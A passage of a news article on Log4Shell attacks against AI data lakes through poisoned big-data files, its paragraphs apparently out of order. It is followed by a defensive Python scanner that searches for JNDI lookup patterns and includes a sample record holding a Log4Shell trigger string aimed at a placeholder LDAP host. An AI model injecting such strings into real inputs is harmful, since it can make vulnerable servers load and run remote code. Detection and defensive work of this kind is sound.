“The simplicity of the Log4jShell exploit is what makes it so nefarious,” says David Hirko, founder at Zectonal.

And, since the big-data file carrying the poison payload is often encrypted or compressed, the difficulty of detection is much greater. An attacker could simply embed the string within a malicious big-data file payload to open up a shell inside the data lake, and from there can initiate a data-poisoning attack, researchers say.

Generally, organizations are focused on ingesting as many data points as they can for training an AI or algorithm, with an eye toward privacy - but all too often, they’re skipping over hardening the security of the data lakes themselves.

According to research from Zectonal, the Log4Shell bug can be triggered once the payload is ingested into a target data lake or data repository via a data pipeline, bypassing conventional safeguards, such as application firewalls and traditional scanning devices.

As with the original attacks targeting the ubiquitous Java Log4j library, exploitation requires only a single string of text.

Enterprise data lakes are filling up as organizations increasingly embrace artificial intelligence (AI) and machine learning - but unfortunately, these are vulnerable to exploitation via the Java Log4Shell vulnerability, researchers have found.
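Because the article's point is that compression hides the string from conventional scanners, the following added example (not from the article or from Zectonal) sketches a pre-ingestion check that peels gzip layers before searching each record for a Log4j JNDI lookup. The `${jndi:` prefix is the well-known Log4Shell trigger; the size and depth limits, function names and sample records are assumptions constructed for illustration, and encrypted files would have to be scanned after decryption.

```python
import gzip
import io
import re
import zlib

# Direct JNDI lookup, or one lookup nested inside another (a common obfuscation).
LOOKUP = re.compile(rb"\$\{\s*jndi\s*:|\$\{[^{}]*\$\{", re.IGNORECASE)
GZIP_MAGIC = b"\x1f\x8b"
MAX_DEPTH = 3          # assumption: cap on nested compression layers
MAX_BYTES = 64 << 20   # assumption: cap on decompressed size (bomb guard)

def unwrap(data):
    """Peel gzip layers off a file body; raise ValueError past the limits."""
    depth = 0
    while data[:2] == GZIP_MAGIC:
        if depth >= MAX_DEPTH:
            raise ValueError("too many compression layers")
        with gzip.GzipFile(fileobj=io.BytesIO(data)) as fh:
            data = fh.read(MAX_BYTES + 1)
        if len(data) > MAX_BYTES:
            raise ValueError("decompressed size over limit")
        depth += 1
    return data

def scan_file_bytes(data):
    """Return (line_number, matched_text) findings for one inbound data file."""
    try:
        plain = unwrap(data)
    except (OSError, EOFError, zlib.error, ValueError) as exc:
        # A file that cannot be inspected is held back, not ingested blind.
        return [(0, f"quarantine: {exc}")]
    findings = []
    for num, line in enumerate(plain.splitlines(), start=1):
        m = LOOKUP.search(line)
        if m:
            snippet = line[m.start():m.start() + 60]
            findings.append((num, snippet.decode("latin-1")))
    return findings

# Constructed sample: a gzip-compressed CSV whose second record carries a lookup.
SAMPLE = gzip.compress(
    b"id,user_agent\n"
    b"1,Mozilla/5.0\n"
    b"2,${jndi:ldap://example.invalid/a}\n"
)

if __name__ == "__main__":
    print(scan_file_bytes(SAMPLE))
```

A finding on line 0 means the file could not be unpacked within the limits and should be quarantined rather than passed to the pipeline.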